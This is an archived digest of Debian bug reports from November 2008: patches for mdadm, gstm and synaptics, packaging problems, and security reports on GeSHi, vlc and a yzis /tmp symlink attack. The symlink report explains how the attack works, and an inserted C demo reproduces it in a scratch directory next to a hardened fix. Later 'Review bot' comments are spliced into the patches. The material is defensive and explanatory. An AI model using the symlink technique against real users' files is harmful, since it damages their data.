Bug#494683: IfModule Apache2/Reload.pm is not working

2008-11-05 Thread Javier Barroso
Hi,

I had to comment



on /etc/apache2/conf.d/otrs2

with it, the module won't load.

I don't know if it is an otrs2 bug or should go to another package.

Thank you
-- 
Javier Barroso
Systems Administrator
Corporate Services Directorate: IT
[EMAIL PROTECTED]
__

ISOTROL
Edificio BLUENET. Avda. Isaac Newton, s/n, Isla de la Cartuja
41092 Sevilla.
Tel.: 955 036 800 - Fax: 955 036 849
www.isotrol.com



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#500971: Bug fixed in version 1.40 Beta 1

2008-11-05 Thread Rafael Jesús Alcántara Pérez
Hi:

It seems that this bug [1] and others [2], have been fixed in the new version 
1.40 Beta 1 [3]:

Greets and thanks for your work.

[1]http://trac.transmissionbt.com/ticket/1305
[2]http://trac.transmissionbt.com/query?milestone=1.40&group=component&groupdesc=1&order=severity
[3]http://www.transmissionbt.com/
-- 
+--
| Rafael Jesús Alcántara Pérez <[EMAIL PROTECTED]>
| Technical Director.
| Landline: 952 602 959
| Mobile: 661 673 272
| Fax: 952 602 959
| Address: C/ Afligidos 2, 3º Derecha, 29015 Málaga
| Dédalo Ingenieros, S.L.: http://www.dedaloingenieros.com/
| PGP: http://pgp.rediris.es:11371/pks/lookup?op=index&search=0x53F330AB
+-
"For every complex problem there is a solution that is concise, clear,
simple, and wrong." (H. L. Mencken)


signature.asc
Description: This is a digitally signed message part.


Bug#498505: mdadm: Bug still not fixed

2008-11-05 Thread Neil Brown
On Monday November 3, [EMAIL PROTECTED] wrote:
> Package: mdadm
> Version: 2.6.7.1-1
> Followup-For: Bug #498505
> 
> 
> Problem still not fixed in 2.6.7.1-1. I start to reshape RAID5 array and
> reboot machine. After that, mdadm --assemble causes segmentation fault. While
> machine was powered off, some drives were moved to other SATA connectors and
> devices in Linux were changed respectively (/dev/sdg was moved to /dev/sdd).

This bug is fixed by commit 56f8add211a840faaed325bd16483b55da544e93
which is scheduled to be in 2.6.8, but was not included in 2.6.7.1.

I include it below.

NeilBrown

From 56f8add211a840faaed325bd16483b55da544e93 Mon Sep 17 00:00:00 2001
From: Neil Brown <[EMAIL PROTECTED]>
Date: Thu, 19 Jun 2008 16:30:36 +1000
Subject: [PATCH] Fix an error when assembling arrays that are in the middle of 
a reshape.

It is important that dup_super always returns an 'st' with the same
->ss and ->minor_version as the st that was passed.
This wasn't happening for 0.91 metadata (i.e. in the middle of a reshape).
---
 super0.c |    5 ++++-
 1 files changed, 4 insertions(+), 1 deletions(-)

diff --git a/super0.c b/super0.c
index 7e81482..8e4c568 100644
--- a/super0.c
+++ b/super0.c
@@ -849,12 +849,15 @@ static struct supertype *match_metadata_desc0(char *arg)
st->sb = NULL;
if (strcmp(arg, "0") == 0 ||
strcmp(arg, "0.90") == 0 ||
-   strcmp(arg, "0.91") == 0 ||
strcmp(arg, "default") == 0 ||
strcmp(arg, "") == 0 /* no metadata */
)
return st;
 
+   st->minor_version = 91; /* reshape in progress */
+   if (strcmp(arg, "0.91") == 0) /* For dup_super support */
+   return st;
+
st->minor_version = 9; /* flag for 'byte-swapped' */
if (strcmp(arg, "0.swap")==0 ||
strcmp(arg, "0.9") == 0) /* For dup_super support */
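Review bot: the added "st->minor_version = 91;" sits between the first "return st;" and the existing "st->minor_version = 9;", so the function now distinguishes three metadata variants purely by statement order, using the bare literals 91 and 9. Any later comparison inserted between these blocks, or a reordering of them, would return an st with the wrong minor_version, which is the mismatch the commit message says dup_super must never produce. Consider assigning the version inside each matching branch or naming the two constants, and state at the top of the function that every accepted string maps to exactly one minor_version.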
-- 
1.5.6.5







Bug#504682: SA32559: GeSHi Unspecified Code Execution Vulnerability

2008-11-05 Thread Raphael Geissert
Package: dokuwiki
Severity: grave
Version: 0.0.20061106-6
Tags: security

Hi,

The following SA (Secunia Advisory) id was published for GeSHi, which affects 
the embedded copy in dokuwiki[0].

SA32559[1]:
> A vulnerability has been reported in GeSHI, which can potentially be
> exploited by malicious people to compromise a vulnerable system.
>
> The vulnerability is caused due to an unspecified error, which may allow
> execution of arbitrary code on an affected system.
>
> The vulnerability is reported in versions prior to 1.0.8.1.

It would be great if dokuwiki just depended on php-geshi (also available in 
etch) and the include/require calls changed to use the copy provided by that 
package, to avoid shipping yet another embedded code copy.

If you fix the vulnerability please also make sure to include the SA id in the 
changelog entry.

[0]usr/share/dokuwiki/inc/geshi.php
[1]http://secunia.com/Advisories/32559/

Cheers,
-- 
Raphael Geissert - Debian Maintainer
www.debian.org - get.debian.net




Bug#504680: yzis: symlink attack vulnerability

2008-11-05 Thread Guillem Jover
Source: yzis
Source-Version: 1.0~alpha1-1
Severity: serious
Tags: security

Hi,

This source (affecting all frontends) is vulnerable to a symlink attack.
The frontends (I guess the library might be doing this as it's the same
behaviour in all cases) write to «/tmp/yzisdebug-$USER.log».

If we create a symlink pointing to some non-existent file, the frontend
will create it with zero length on startup but segfault immediately. On
the other hand if the symlink points to an existent file the frontends
will just remove the current symlink and create a new file ignoring
the pointed file.

So at least this can be used to create zero length files on behalf of
the user running the program.

The best fix would be to not write that debug log file at all.

regards,
guillem
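
One way to open such a log without following a planted link, as an added example that is not part of the original report and is not yzis code. The helper names and the scratch directory under /tmp are assumptions made for the demonstration; it runs the create-and-truncate open and an O_EXCL/O_NOFOLLOW open against the same constructed dangling symlink.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE             /* O_NOFOLLOW, O_CLOEXEC, mkdtemp */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern described in the report: fixed name, create-or-truncate open.
 * open() follows a symlink in the last path component, so the file is
 * created wherever the link points. */
static int open_log_naive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened opener (hypothetical helper, not yzis code). */
static int open_log_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC,
                  0600);
    if (fd >= 0)
        return fd;              /* created fresh, owned by us */
    if (errno != EEXIST)
        return -1;
    /* Name already taken: reopen without O_CREAT; a symlink yields ELOOP. */
    fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    /* Accept only a regular file we own that has no other hard links. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a private scratch directory holding a dangling
 * symlink "debug.log" -> "victim". Runs one opener against the link.
 * Returns 1 if the link target got created, 0 if not, -1 on setup error. */
static int target_created_by(int (*opener)(const char *))
{
    char dir[] = "/tmp/logdemo-XXXXXX";
    char link_path[64], victim[64];
    int fd, created;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(link_path, sizeof link_path, "%s/debug.log", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, link_path) != 0) {
        rmdir(dir);
        return -1;
    }
    fd = opener(link_path);
    if (fd >= 0)
        close(fd);
    created = (access(victim, F_OK) == 0);

    unlink(victim);
    unlink(link_path);
    rmdir(dir);
    return created;
}

int naive_creates_target(void) { return target_created_by(open_log_naive); }
int safe_creates_target(void)  { return target_created_by(open_log_safe); }

/* Normal case: no file yet, so the safe opener creates it with mode 0600.
 * Returns the permission bits, or -1 on failure. */
int safe_fresh_file_mode(void)
{
    char dir[] = "/tmp/logdemo-XXXXXX";
    char path[64];
    struct stat st;
    int fd, mode = -1;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/debug.log", dir);
    fd = open_log_safe(path);
    if (fd >= 0 && fstat(fd, &st) == 0)
        mode = (int)(st.st_mode & 0777);
    if (fd >= 0)
        close(fd);
    unlink(path);
    rmdir(dir);
    return mode;
}

int main(void)
{
    printf("naive open created link target: %d\n", naive_creates_target());
    printf("safe open created link target:  %d\n", safe_creates_target());
    printf("safe open, fresh file mode:     %o\n", safe_fresh_file_mode());
    return 0;
}
```

Placing the log in a directory only the user can write to removes the race on the name altogether; the checks above matter when a shared directory such as /tmp cannot be avoided.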






Bug#504681: SA32559: GeSHi Unspecified Code Execution Vulnerability

2008-11-05 Thread Raphael Geissert
Package: pgfouine
Severity: grave
Version: 0.7-1
Tags: security

Hi,

The following SA (Secunia Advisory) id was published for GeSHi, which affects 
the embedded copy in pgfouine[0].

SA32559[1]:
> A vulnerability has been reported in GeSHI, which can potentially be
> exploited by malicious people to compromise a vulnerable system.
>
> The vulnerability is caused due to an unspecified error, which may allow
> execution of arbitrary code on an affected system.
>
> The vulnerability is reported in versions prior to 1.0.8.1.

It would be great if pgfouine just depended on php-geshi (also available in 
etch) and the include/require calls changed to use the copy provided by that 
package, to avoid shipping yet another embedded code copy.

If you fix the vulnerability please also make sure to include the SA id in the 
changelog entry.

[0]usr/share/pgfouine/include/reporting/geshi/geshi.php
[1]http://secunia.com/Advisories/32559/

Cheers,
-- 
Raphael Geissert - Debian Maintainer
www.debian.org - get.debian.net




Bug#504604: Could not reproduce

2008-11-05 Thread Tim Richardson
To simplify this, I think you are saying that in v2.4, you see that a
formula like this
=if(A1-B1<>0;1;C1) returns an error 529 when C1 contains "" and A1 and
B1 are empty

I made a simplified test case in OOo 2.4 (the lenny version)
The formula behaves the same in 2.4 and 3.0. My 3.0 is the experimental
version.
In both cases, the formula evaluates to ""

I think you are trying to report this:

https://bugs.launchpad.net/openoffice/+bug/210153

but if I am correct, it would mean that while you think you have empty cells in 
T10 and Z10, you don't.

So I don't understand your report. 




bug504604_1.ods
Description: application/vnd.oasis.opendocument.spreadsheet



Bug#504373: Template Toolkit, Template::DBI and Etch updates breakage

2008-11-05 Thread Benj. Mako Hill

> On Wed, Nov 05, 2008 at 12:03:14PM +, Dominic Hargreaves wrote:
> > ftpmaster, I've just uploaded libtemplate-plugin-dbi-perl to NEW in
> > order to fix an RC bug in libtemplate-perl (this is a regression from
> > the functionality in etch; the code is in the main libtemplate-perl
> > package in etch).
> > 
> > Please could you process this as a lenny-related priority?
> 
> Further to this, attached is my proposed NMU diff once
> libtemplate-plugin-dbi-perl is available. Notice I've moved some other
> packages from Suggests to Recommend on the advice of 
> 
> http://lists.debian.org/debian-release/2008/07/msg00828.html

Thanks for handling this Dominic.

Later,
Mako


-- 
Benjamin Mako Hill
[EMAIL PROTECTED]
http://mako.cc/

Creativity can be a social contribution, but only in so far
as society is free to use the results. --GNU Manifesto




Bug#504657: (no subject)

2008-11-05 Thread Ryan Niebur
I will take care of this later tonight.

-- 
_
Ryan Niebur
[EMAIL PROTECTED]




Processed: your mail

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> found 504657 1.2-4
Bug#504657: gstm: implicit pointer conversions
Bug marked as found in version 1.2-4.

> --
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504661: [pkg-nvidia-devel] Bug#504661: nvidia-glx-legacy-96xx-dev: /usr/lib/libGL.so symlink broken

2008-11-05 Thread Randall Donald

> 
> % chase /usr/lib/libGL.so  
> chase: /usr/lib/libGL.so.100.14.19: No such file or directory
> 
so your /usr/lib/GL.so is pointing to /usr/lib/libGL.so.100.14.19 ???
Maybe the symlink remained from a previous install and didn't get
overwritten. The init script must not check. 


> Also, how come it's the nvidia-glx-legacy-96xx package that diverts
> libGL.so, not this one?
> 
Because people use libgl1-mesa-dev to compile against Mesa.  










Bug#504639: marked as done (vlc: buffer overflow in CUE support)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Thu, 06 Nov 2008 00:02:09 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504639: fixed in vlc 0.8.6.h-5
has caused the Debian Bug report #504639,
regarding vlc: buffer overflow in CUE support
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504639: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504639
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: vlc-nox
Version: 0.8.6.h-4.1
Severity: grave
Tags: security
Justification: user security hole


Hello,

When parsing the header of an invalid CUE image file or an invalid
RealText subtitle file, stack-based buffer overflows might occur:
http://www.videolan.org/security/sa0810.html

(I believe the RealText problem only affects experimental)

Regards.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (100, 'unstable'), (100, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages vlc-nox depends on:
ii  liba52-0.7.4      0.7.4-11          library for decoding ATSC A/52 str
ii  libasound2        1.0.16-2          ALSA library
ii  libavahi-client3  0.6.23-2          Avahi client library
ii  libavahi-common3  0.6.23-2          Avahi common library
ii  libavc1394-0      0.5.3-1+b1        control IEEE 1394 audio/video devi
ii  libavcodec51      0.svn20080206-14  ffmpeg codec library
ii  libavformat52     0.svn20080206-14  ffmpeg file format library
ii  libavutil49       0.svn20080206-14  ffmpeg utility library
ii  libc6             2.7-15            GNU C Library: Shared libraries
ii  libcdio7          0.78.2+dfsg1-3    library to read and control CD-ROM
ii  libdbus-1-3       1.2.1-4           simple interprocess messaging syst
ii  libdvbpsi4        0.1.5-3.1         library for MPEG TS and DVB PSI ta
ii  libdvdnav4        4.1.2-3           DVD navigation library
ii  libdvdread3       0.9.7-11          library for reading DVDs
ii  libebml0          0.7.7-3.1         access library for the EBML format
ii  libfaad0          2.6.1-3.1         freeware Advanced Audio Decoder -
ii  libflac8          1.2.1-1.2         Free Lossless Audio Codec - runtim
ii  libfreetype6      2.3.7-2           FreeType 2 font engine, shared lib
ii  libfribidi0       0.10.9-1          Free Implementation of the Unicode
ii  libgcc1           1:4.3.2-1         GCC support library
ii  libgcrypt11       1.4.1-1           LGPL Crypto library - runtime libr
ii  libgnutls26       2.4.2-1           the GNU TLS library - runtime libr
ii  libhal1           0.5.11-6          Hardware Abstraction Layer - share
ii  libid3tag0        0.15.1b-10        ID3 tag reading library from the M
ii  libiso9660-5      0.78.2+dfsg1-3    library to work with ISO9660 files
ii  liblircclient0    0.8.3-3           infra-red remote control support -
ii  libmad0           0.15.1b-3         MPEG audio decoder library
ii  libmatroska0      0.8.1-1.1         extensible open standard audio/vid
ii  libmodplug0c2     1:0.8.4-2         shared libraries for mod music bas
ii  libmpcdec3        1.2.2-1           Musepack (MPC) format library
ii  libmpeg2-4        0.4.1-3           MPEG1 and MPEG2 video decoder libr
ii  libncurses5       5.6+20081025-1    shared libraries for terminal hand
ii  libogg0           1.1.3-4           Ogg Bitstream Library
ii  libpng12-0        1.2.27-2          PNG library - runtime
ii  libpostproc51     0.svn20080206-14  ffmpeg video postprocessing librar
ii  libraw1394-8      1.3.0-4           library for direct access to IEEE
ii  libsmbclient      2:3.2.4-1         shared library that allows applica
ii  libspeex1         1.2~rc1-1         The Speex codec runtime library
ii  libstdc++6        4.3.2-1           The GNU Standard C++ Library v3
ii  libsysfs2         2.1.0-5           interface library to sysfs
ii  libtheora0        1.0~beta3-1       The Theora Video Compression Codec
ii  libtwolame0       0.3.12-1          MPEG Audio Layer 2 encoding librar
ii  libvcdinfo0       0.7.23-4          library to extract information fro
ii  libvlc0           0.8.6.h-4.1       multimedia player and streamer lib
ii  libvorbis0a       1.2.0.dfsg-3.1    The Vorbis General Audio Compressi
ii  libvorbisenc2     1.2.0.dfsg-3.1    The Vorbis General A

Bug#504639: marked as done (vlc: buffer overflow in CUE support)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Thu, 06 Nov 2008 00:02:05 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504639: fixed in vlc 0.8.6.h-4+lenny2
has caused the Debian Bug report #504639,
regarding vlc: buffer overflow in CUE support
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504639: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504639
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

Bug#382175: Sun RPC libraries and other stories

2008-11-05 Thread Ean Schuessler
- "Michael Banck" <[EMAIL PROTECTED]> wrote:
> The code is copyrighted by Sun, not some particular employee, so AFAICT 
> digging up who wrote it will not be necessary.

Please understand that asking Sun to relicense source is a little like asking 
Debian to hurry up and release Lenny. Different pieces of source are controlled 
by various people who work in various departments in Sun. You can't just walk 
up to the "universal source control desk" and say "please relicense this". 
Their internal versions that their lawyers are used to dealing with are almost 
certainly not the same things that we are using.

The main thing is, good news, they want to help!

> This is portmap-6.0, from http://neil.brown.name/portmap/

> http://sourceware.org/cgi-bin/cvsweb.cgi/libc/sunrpc/?cvsroot=glibc

> it would be desirable if Sun would relicense the past versions as well,
> as Lenny will ship with glibc-2.7.  The tarballs can be found at
> ftp://sources.redhat.com/pub/glibc/

These look good, Simon has already read the email and forwarded these links 
along to some Sun legal people.

-- 
Ean Schuessler, CTO Brainfood.com
[EMAIL PROTECTED] - http://www.brainfood.com - 214-720-0700 x 315






Bug#382175: Sun RPC libraries and other stories

2008-11-05 Thread Michael Banck
On Wed, Nov 05, 2008 at 05:07:07PM -0600, Ean Schuessler wrote:
> > Assuming Sun is the sole copyright holder of that code, he could advise
> > their IP lawyers/whoever to relicense the code; either to the glibc
> > license (LGPL-1.2 or later, currently), or perhaps the BSD license.  The
> > latter would probably be best for portmap as well, considering it is BSD
> > licensed.
> > 
> > If Sun does not want to relicense to BSD/LGPL this code due to their
> > corporate licensing strategy, but still want to see the code remain in
> > Debian's glibc/portmap, they should propose a compatible license they
> > like I'd say.
> 
> For Sun to make this happen we just have to help them line things up.
> On the one hand, similar code exists in Solaris but we don't want to
> go through the headache of trying to reintegrate that code into our
> stack. We need to wave a magic licensing wand over the particular code
> that we are using, in place. Since this code is from 1984 we have to
> go through some archeological processes to locate the people in Sun
> that are the duly designated authorities.

The code is copyrighted by Sun, not some particular employee, so AFAICT 
digging up who wrote it will not be necessary.

For portmap:

 - from_local.c:

 /*
  * Check if an address belongs to the local system. Adapted from:
  * 
  * pmap_svc.c 1.32 91/03/11 Copyright 1984,1990 Sun Microsystems, Inc.
  * get_myaddress.c  2.1 88/07/29 4.0 RPCSRC.
  */

 - portmap.c

 /*
 @(#)portmap.c   2.3 88/08/11 4.0 RPCSRC
 static char sccsid[] = "@(#)portmap.c 1.32 87/08/06 Copyr 1984 Sun
 Micro";
 */

This is portmap-6.0, from http://neil.brown.name/portmap/


For glibc, it is basically everything in glibc/sunrpc, which got taken
from rpcsrc-4.0 according to the top-level LICENSING file:

"The Sun RPC support (from rpcsrc-4.0) is covered by the following
license: [...]"

The trunk code can be viewed at
http://sourceware.org/cgi-bin/cvsweb.cgi/libc/sunrpc/?cvsroot=glibc but
it would be desirable if Sun would relicense the past versions as well,
as Lenny will ship with glibc-2.7.  The tarballs can be found at
ftp://sources.redhat.com/pub/glibc/

> What we need to do for them is provide them a list of URLs to the
> elements we need re-licensed and the license we think would solve the
> most problems for us. Sun can then take that source and start tracking
> down who needs to authorize it.


Hope that helps,

Michael






Bug#504661: nvidia-glx-legacy-96xx-dev: /usr/lib/libGL.so symlink broken

2008-11-05 Thread Samuel Bronson
Package: nvidia-glx-legacy-96xx-dev
Version: 96.43.07-2
Severity: grave

% chase /usr/lib/libGL.so  
chase: /usr/lib/libGL.so.100.14.19: No such file or directory

% dpkg -L nvidia-glx-legacy-96xx | grep 'libGL\.'
/usr/lib/libGL.so.96.43.07
/usr/lib/libGL.so.1

Also, how come it's the nvidia-glx-legacy-96xx package that diverts
libGL.so, not this one?

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-2-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages nvidia-glx-legacy-96xx-dev depends on:
ii  nvidia-glx-legacy-96xx  96.43.07-2  NVIDIA binary Xorg driver (96xx le

nvidia-glx-legacy-96xx-dev recommends no packages.

-- no debconf information






Bug#504659: tasksel: Gnome pushes File and DNS server and language tasks off CD1

2008-11-05 Thread Frans Pop
Package: tasksel
Version: 2.76
Severity: serious
Justification: Unsuitable for release

While testing a Lenny RC2 preview CD in a "CD1 only, no mirror"
installation, I noticed that the File server and DNS server tasks
were missing from the list of available tasks during pkgsel. This
also means that the CD contains no language tasks at all.

It looks like the main reason for this is the recent changes in the
gnome-desktop task, which changed its "key" package to 'gnome' from
'gnome-desktop-environment'. Result of this change is that Gnome
takes up ~60MB more on CD1 than it used to and thus pushes off other
tasks.

This can be easily seen by running 'aptitude -R' on a clean system
(the difference in the last column is what's relevant here):
  installed size  download size
gnome-desktop-environment  787MB  304MB
gnome  959MB  368MB

IMO this regression in the contents of CD1 should be fixed for Lenny.

The only way to do this is to change back to 'gnome-desktop-environment'
as "key" package for the gnome-desktop task and make 'gnome' a regular
package in the task.
This will NOT change the installation of Gnome in any way if a mirror
is available or if multiple CDs or a DVD are used. But it will result
in CD1 being more generally usable again for installations where that CD
is the only available source.

Even with that change it still seems to me that Gnome claims too much
space on CD1. The gnome-d-e task depends on a number of packages that,
although important for a good desktop experience, are not so essential
that they need to be on CD1. And I would even say that VNC or webcam
support, a VoIP client, or even a CD burner are "required" for a desktop
system as users may just not have the hardware or be interested in that
functionality.

I would therefore suggest to change the following packages from Depends
to Recommends in gnome-d-e:
- gnome-user-guide (16MB download size!)
- vinagre
- vino
- ekiga
- cheese
- nautilus-cd-burner

Total savings from this suggested list for CD1: 36MB. Possibly some other
packages from gnome-d-e's current dependencies could be added to this list.

Having them as Recommends would mean they will still get installed if
users install gnome-d-e manually and adds flexibility as users will gain
the option to have gnome-d-e installed without those packages if they
don't need them.

To ensure the packages still get installed during a desktop installation
using D-I there are two options:
- adding them as Depends in the 'gnome' meta-package (preferred IMO)
- listing them separately as non-key packages in the gnome-desktop task

The main benefit of this reduction will be better international support on
CD1 as there will be much more space available for "key" packages from
language tasks.

Cheers,
FJP

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages tasksel depends on:
ii  aptitude 0.4.11.10-1lenny1.1 terminal-based package manager
ii  debconf [debconf-2.0 1.5.24  Debian configuration management sy
ii  liblocale-gettext-pe 1.05-4  Using libc functions for internati
ii  tasksel-data 2.76    Official tasks used for installati

tasksel recommends no packages.

tasksel suggests no packages.

-- debconf information excluded






Bug#382175: Sun RPC libraries and other stories

2008-11-05 Thread Ean Schuessler
- "Michael Banck" <[EMAIL PROTECTED]> wrote:

> Assuming Sun is the sole copyright holder of that code, he could advise
> their IP lawyers/whoever to relicense the code; either to the glibc
> license (LGPL-1.2 or later, currently), or perhaps the BSD license.  The
> latter would probably be best for portmap as well, considering it is BSD
> licensed.
> 
> If Sun does not want to relicense to BSD/LGPL this code due to their
> corporate licensing strategy, but still want to see the code remain in
> Debian's glibc/portmap, they should propose a compatible license they
> like I'd say.

For Sun to make this happen we just have to help them line things up. On the 
one hand, similar code exists in Solaris but we don't want to go through the 
headache of trying to reintegrate that code into our stack. We need to wave a 
magic licensing wand over the particular code that we are using, in place. 
Since this code is from 1984 we have to go through some archeological processes 
to locate the people in Sun that are the duly designated authorities.

What we need to do for them is provide them a list of URLs to the elements we 
need re-licensed and the license we think would solve the most problems for us. 
Sun can then take that source and start tracking down who needs to authorize it.

> Thanks for working on this, let's hope we can resolve this in time for
> Lenny!

No problem. I'm here so I might as well do something useful!

-- 
Ean Schuessler, CTO Brainfood.com
[EMAIL PROTECTED] - http://www.brainfood.com - 214-720-0700 x 315






Bug#504657: gstm: implicit pointer conversions

2008-11-05 Thread dann frazier
Package: gstm
Version: 1.2-5
Severity: serious
Tags: patch
Usertags: implicit-pointer-conversions

Our automated buildd log filter[1] detected a problem that is likely to
cause your package to segfault on architectures where the size of a
pointer is greater than the size of an integer, such as ia64 and amd64.

  Function `gstm_name2filename' implicitly converted to pointer at callbacks.c:466
  Function `create_pixbuf' implicitly converted to pointer at notarea.c:93

This is often due to a missing function prototype definition.
For more information, see [2].

Though it is guaranteed that this codepath will cause a segfault on certain
architectures, it is not guaranteed that this codepath would ever be executed
(e.g., if the returned pointer is never dereferenced). However, this bug
does prevent the ia64 buildd from successfully building this package, resulting
in a practical FTBFS issue and warranting the serious severity.

[1] http://people.debian.org/~dannf/check-implicit-pointer-functions
[2] http://wiki.debian.org/ImplicitPointerConversions
diff -urpN gstm-1.2.orig/src/callbacks.c gstm-1.2/src/callbacks.c
--- gstm-1.2.orig/src/callbacks.c	2006-08-03 02:39:51.0 -0600
+++ gstm-1.2/src/callbacks.c	2008-11-05 15:47:34.0 -0700
@@ -13,6 +13,7 @@
 #include "conffile.h"
 
 extern void gstm_quit(void);
+extern char *gstm_name2filename(char *n);
 extern void docklet_x11_create(void);
 extern void docklet_x11_position_menu(GtkMenu *menu, int *x, int *y, gboolean *push_in, gpointer user_data);
 
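Review bot: the prototype for gstm_name2filename is added as a one-off extern in callbacks.c, next to "extern void gstm_quit(void);", rather than in a header shared with the file that defines the function, so nothing makes the compiler check that this declaration and the definition agree. If the definition's signature changes later, this copy goes stale without a diagnostic. Move the declaration into a header that both the defining file and callbacks.c include.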
diff -urpN gstm-1.2.orig/src/notarea.c gstm-1.2/src/notarea.c
--- gstm-1.2.orig/src/notarea.c	2006-08-02 06:43:50.0 -0600
+++ gstm-1.2/src/notarea.c	2008-11-05 15:50:42.0 -0700
@@ -34,6 +34,8 @@
 #include "eggtrayicon.h"
 EggTrayIcon *docklet = NULL;
 static GtkWidget *image = NULL;
+extern GdkPixbuf *create_pixbuf(const gchar *filename);
+
 extern void docklet_clicked(int);
 
 static void docklet_x11_destroyed_cb(GtkWidget *widget, void *data);
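Review bot: "extern GdkPixbuf *create_pixbuf(const gchar *filename);" is hand-written into notarea.c between the static image variable and the docklet_clicked declaration, and the file has no include that would tie it to the function's definition. Prefer including the header that declares create_pixbuf if the tree has one, and add one otherwise. Building with -Werror=implicit-function-declaration would then fail the build on any remaining caller that lacks a prototype, instead of leaving it to the buildd log filter.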


Bug#504656: xserver-xorg-input-synaptics: Stops working after logoff

2008-11-05 Thread Max Dmitrichenko
Package: xserver-xorg-input-synaptics
Version: 0.14.7~git20070706-4~dmitrmax.1
Severity: grave
Tags: patch
Justification: renders package unusable


Driver forgets to ungrab the event device so the next time it is grabbed EBUSY
is returned.
This happens e.g. when I log off from a KDE session and return to the KDM screen.
Only restarting the X server helps.

Below is a patch that fixes the problem.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages xserver-xorg-input-synaptics depends on:
ii  libc6 2.7-15 GNU C Library: Shared libraries
ii  libx11-6  2:1.1.5-2  X11 client-side library
ii  libxext6  2:1.0.4-1  X11 miscellaneous extension librar
ii  libxi62:1.1.3-1  X11 Input extension library
ii  xserver-xorg-core 2:1.4.2-7  Xorg X server - core server

xserver-xorg-input-synaptics recommends no packages.

Versions of packages xserver-xorg-input-synaptics suggests:
pn  gsynaptics | ksynaptics | qsy  (no description available)

-- no debconf information


--- xfree86-driver-synaptics-0.14.7~git20070706.orig/eventcomm.c
+++ xfree86-driver-synaptics-0.14.7~git20070706/eventcomm.c
@@ -58,6 +58,16 @@
 static void
 EventDeviceOffHook(LocalDevicePtr local)
 {
+SynapticsPrivate *priv = (SynapticsPrivate *) (local->private);
+
+if (priv->synpara->grab_event_device) {
+   int ret;
+   SYSCALL(ret = ioctl(local->fd, EVIOCGRAB, (pointer)0));
+   if (ret < 0) {
+   xf86Msg(X_WARNING, "%s can't ungrab event device, errno=%d\n",
+   local->name, errno);
+   }
+}
 }
 
 static void
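
Review bot: the ungrab in EventDeviceOffHook is keyed on priv->synpara->grab_event_device, which is the configured option and not a record of whether the earlier grab actually succeeded; if that option can change while the device is on, grab and ungrab no longer pair up. Store the grab state in the private struct when the grab succeeds and test that here. The warning would also be easier to act on with strerror(errno) printed next to the number.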


Bug#504167: linux-2.6 - regression: fails to unblank on resume

2008-11-05 Thread Jan Korbel

So I can resume with vanilla 2.6.26.5 and 2.6.27.4, but can't resume
with 2.6.26.6. With 2.6.27.4 there is a small delay (about 3s) after
resume and switch to X (screensaver), when keyboard and touchpad are
not active. There is no delay with 2.6.26.5.

And as a bonus, I can't change CPU frequency with Debian kernel 2.6.26-9
and vanilla 2.6.26.6. Vanilla 2.6.26.5, 2.6.27.4 and Debian 2.6.26-8 are
ok. Should I open another bug report?


J.




